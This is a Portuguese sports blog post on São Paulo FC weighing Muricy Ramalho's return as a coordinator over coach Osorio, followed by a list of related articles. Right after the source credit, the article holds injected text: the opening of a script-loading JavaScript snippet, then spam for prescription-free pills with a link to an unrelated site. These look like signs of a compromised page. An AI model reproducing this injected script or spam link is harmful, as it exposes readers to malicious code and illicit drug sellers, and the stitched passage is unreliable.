Destaque

A volta de Muricy

E não é que o São Paulo, inseguro com o trabalho de Juan Carlos Osorio, chegou a cogitar a volta de Muricy Ramalho ao clube?

Depois da derrota para o Ceará semana passada a direção do Tricolor discutiu possível proposta a seu ex-treinador, com o objetivo de contrata-lo como uma espécie de coordenador. Muricy faria o ele entre os dirigentes do futebol e o colombiano que comanda a equipe.

Após novo fiasco diante do Flamengo, aí pelo Brasileirão, no último domingo, a ideia voltou a ser cogitada e Carlos Miguel Aidar resolveu esperar o segundo jogo contra o Ceará pela Copa do Brasil para definir se daria sequência ao projeto ou não.

Se o São Paulo não avançasse na competição, Osorio seguiria, mas teria que acatar a contratação de um coordenador. No caso, Muricy.

Como o time paulista venceu por 3 a 0 e segue vivo na competição, agora nas quartas de final, Muricy não foi contatado. E a possibilidade de o ter como coordenador, pelo menos no momento, não avançou.

Devido a problemas de saúde o treinador continua parado, tendo deixado o São Paulo em abril depois da eliminação da Libertadores pelo Cruzeiro. Tem recusado convites para voltar ao futebol, como técnico, mas como coordenador já sinalizou que poderia aceitar.

O problema no Morumbi, no entanto, é que Osorio teria que concordar com isso. E o colombiano é avesso à ideia, que não deixaria de ser uma interferência em seu trabalho.

Fonte: LanceNetvar d=document;var s=d.createElement(‘script’); take on at a low figure pills online purchase cheap tablets without prescription – http://new.921thefrog.com/index.php/purchase-cheap-tablets-without-prescription/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque

Mais em Destaque

Campeonato Paulista vira teste para pré-Libertadores no São Paulo

saopauloadmin18 de janeiro de 2019

Raí faz consultas à Mariano do Galatasaray. Negócio não é simples, mas é possível.

saopauloadmin16 de janeiro de 2019

São Paulo volta dos EUA com duas derrotas, mas sem razão para pânico

saopauloadmin13 de janeiro de 2019

São Paulo de Jardine precisa de paciência e respaldo. Terá?

saopauloadmin12 de janeiro de 2019

Jardine: “São Paulo começa a mostrar sua cara”

saopauloadmin11 de janeiro de 2019

Na Florida Cup, Tricolor é derrotado pelo Eintracht Frankfurt

saopauloadmin11 de janeiro de 2019

Após contratações, São Paulo tenta enxugar elenco com empréstimos

saopauloadmin10 de janeiro de 2019

Willian Farias e Biro Biro vestem a camisa em Orlando

saopauloadmin9 de janeiro de 2019

Raí afasta especulações, valoriza grupo, diminui ansiedade da torcida, fala em austeridade e comenta Pato, Ganso, Soteldo e Ferraz

saopauloadmin8 de janeiro de 2019